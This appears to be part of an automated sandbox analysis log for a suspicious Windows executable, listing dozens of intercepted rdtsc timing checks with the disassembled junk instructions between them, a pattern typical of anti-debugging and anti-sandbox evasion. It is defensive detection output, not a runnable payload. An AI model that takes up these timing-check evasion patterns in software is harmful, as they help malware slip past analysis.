Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 7DD6BB second address: 7DD6C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 7DD6C1 second address: 7DD6D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jo 00007F8CECAE075Eh 0x0000000b push edx 0x0000000c pop edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 7DD6D0 second address: 7DD6D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 7DD6D4 second address: 7DD6DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 7DD6DA second address: 7DD6DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 7DD6DE second address: 7DD6E4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 731137 second address: 73113B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 73113B second address: 731163 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop eax 0x00000009 pushad 0x0000000a push ecx 0x0000000b jl 00007F8CECAE0756h 0x00000011 pop ecx 0x00000012 jmp 00007F8CECAE0761h 0x00000017 push ebx 0x00000018 push edx 0x00000019 pop edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 7E3A49 second address: 7E3A52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 7E3BCE second address: 7E3BD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 7E3BD2 second address: 7E3BD6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 7E3BD6 second address: 7E3BE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F8CECAE0756h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 7E3BE5 second address: 7E3BEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 7E3BEA second address: 7E3BFA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8CECAE075Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 7E435A second address: 7E4393 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8CEC76E1FAh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d jmp 00007F8CEC76E1FFh 0x00000012 jmp 00007F8CEC76E207h 0x00000017 pop edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 7E4393 second address: 7E43B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F8CECAE0756h 0x0000000a jmp 00007F8CECAE0766h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 7E43B3 second address: 7E43B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 7E4524 second address: 7E4578 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F8CECAE0756h 0x0000000a pushad 0x0000000b jmp 00007F8CECAE075Fh 0x00000010 jmp 00007F8CECAE075Dh 0x00000015 jno 00007F8CECAE0756h 0x0000001b jmp 00007F8CECAE0766h 0x00000020 popad 0x00000021 popad 0x00000022 push eax 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007F8CECAE075Ch 0x0000002a rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 7E4578 second address: 7E458C instructions: 0x00000000 rdtsc 0x00000002 jne 00007F8CEC76E1F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e jbe 00007F8CEC76E1F6h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 7E4839 second address: 7E4856 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8CECAE0769h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 7E4856 second address: 7E4869 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8CEC76E1FDh 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 7E50F3 second address: 7E510A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8CECAE0763h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 7E510A second address: 7E5114 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 7E35D0 second address: 7E35DE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007F8CECAE0762h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 7E35DE second address: 7E35E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F8CEC76E1F6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 7EC0F2 second address: 7EC0F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 7EC0F8 second address: 7EC117 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8CEC76E200h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jne 00007F8CEC76E1F6h 0x00000012 push edx 0x00000013 pop edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 7EC117 second address: 7EC11D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 7EC11D second address: 7EC137 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8CEC76E206h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 7F6963 second address: 7F6969 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 7F8FFF second address: 7F9010 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F8CEC76E1F6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 7F9010 second address: 7F9014 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 7F9014 second address: 7F901A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 7F9179 second address: 7F9182 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 7F9182 second address: 7F918C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F8CEC76E1F6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 7F918C second address: 7F91A0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8CECAE0760h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 7F91A0 second address: 7F91CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edi 0x00000008 pop edi 0x00000009 push edi 0x0000000a pop edi 0x0000000b jo 00007F8CEC76E1F6h 0x00000011 jp 00007F8CEC76E1F6h 0x00000017 popad 0x00000018 push edx 0x00000019 jmp 00007F8CEC76E1FFh 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 7FE80E second address: 7FE81E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jne 00007F8CECAE075Ah 0x0000000c rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 7FE81E second address: 7FE836 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F8CEC76E1FEh 0x00000008 push eax 0x00000009 pop eax 0x0000000a jnl 00007F8CEC76E1F6h 0x00000010 push eax 0x00000011 push edx 0x00000012 jns 00007F8CEC76E1F6h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 7FE836 second address: 7FE83A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 8043C3 second address: 8043D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8CEC76E1FAh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 8043D1 second address: 8043DD instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 8043DD second address: 8043E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 8089AC second address: 8089B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 80AC3D second address: 80AC41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 80AC41 second address: 80AC45 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 81309C second address: 8130B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8CEC76E204h 0x00000009 pop eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d pop edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 8130B9 second address: 8130E4 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F8CECAE075Ch 0x00000008 push edx 0x00000009 push edi 0x0000000a pop edi 0x0000000b pop edx 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f jnp 00007F8CECAE0758h 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 push ecx 0x00000018 jbe 00007F8CECAE0756h 0x0000001e pushad 0x0000001f popad 0x00000020 pop ecx 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 8130E4 second address: 8130EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 8130EA second address: 8130EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 81AF50 second address: 81AF54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 81AF54 second address: 81AF58 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 819C08 second address: 819C12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F8CEC76E1F6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 819C12 second address: 819C2D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8CECAE0767h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 819EC1 second address: 819ED3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8CEC76E1FAh 0x00000009 pop edi 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 81A18E second address: 81A192 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 81A192 second address: 81A1A5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8CEC76E1FFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 81ACAC second address: 81ACB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 820A23 second address: 820A37 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F8CEC76E1F6h 0x00000008 ja 00007F8CEC76E1F6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push edi 0x00000013 pop edi 0x00000014 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 820A37 second address: 820A3D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 820A3D second address: 820A7D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 jbe 00007F8CEC76E1F6h 0x0000000b pop ebx 0x0000000c pushad 0x0000000d push eax 0x0000000e pop eax 0x0000000f jg 00007F8CEC76E1F6h 0x00000015 push eax 0x00000016 pop eax 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F8CEC76E206h 0x00000021 push edx 0x00000022 jo 00007F8CEC76E1F6h 0x00000028 jp 00007F8CEC76E1F6h 0x0000002e pop edx 0x0000002f rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 83F5E2 second address: 83F5EA instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 83F5EA second address: 83F613 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F8CEC76E1F8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b jmp 00007F8CEC76E209h 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 83F16D second address: 83F173 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 83F173 second address: 83F177 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 83F177 second address: 83F17D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 83F17D second address: 83F19C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F8CEC76E1FFh 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push ecx 0x00000010 push eax 0x00000011 pop eax 0x00000012 push edx 0x00000013 pop edx 0x00000014 pop ecx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 83F19C second address: 83F1A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 83F1A4 second address: 83F1B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 je 00007F8CEC76E1F6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 852A63 second address: 852A7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8CECAE0764h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 852BF9 second address: 852C12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8CEC76E205h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 852C12 second address: 852C16 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 852C16 second address: 852C29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop esi 0x0000000a popad 0x0000000b pushad 0x0000000c push ecx 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f pop ecx 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 852C29 second address: 852C4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F8CECAE0756h 0x0000000a jmp 00007F8CECAE0767h 0x0000000f popad 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 852D9F second address: 852DA5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 852DA5 second address: 852DA9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 852DA9 second address: 852DE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8CEC76E208h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e jg 00007F8CEC76E1F8h 0x00000014 jmp 00007F8CEC76E201h 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c pop eax 0x0000001d rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 8530AC second address: 8530B3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 8530B3 second address: 8530BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a pop esi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 8530BE second address: 8530DA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8CECAE075Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 8530DA second address: 8530E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 855227 second address: 85522D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 8591D1 second address: 8591D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 8591D7 second address: 8591DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 8594FB second address: 859507 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 859507 second address: 859511 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F8CECAE0756h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 859511 second address: 859523 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8CEC76E1FEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 859523 second address: 859527 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 859527 second address: 85955A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 pushad 0x0000000a push edx 0x0000000b mov bx, cx 0x0000000e pop edi 0x0000000f mov dword ptr [ebp+122DB7EDh], edi 0x00000015 popad 0x00000016 push 00000004h 0x00000018 mov dword ptr [ebp+122D2219h], edi 0x0000001e push 20C51E5Ah 0x00000023 pushad 0x00000024 jno 00007F8CEC76E1FCh 0x0000002a pushad 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 85955A second address: 859560 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 85ABDE second address: 85ABF5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8CEC76E1FEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a push esi 0x0000000b pop esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 85CA31 second address: 85CA35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	RDTSC instruction interceptor: First address: 85CA35 second address: 85CA4B instructions: 0x00000000 rdtsc 0x00000002 js 00007F8CEC76E1F6h 0x00000008 jns 00007F8CEC76E1F6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 popad 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
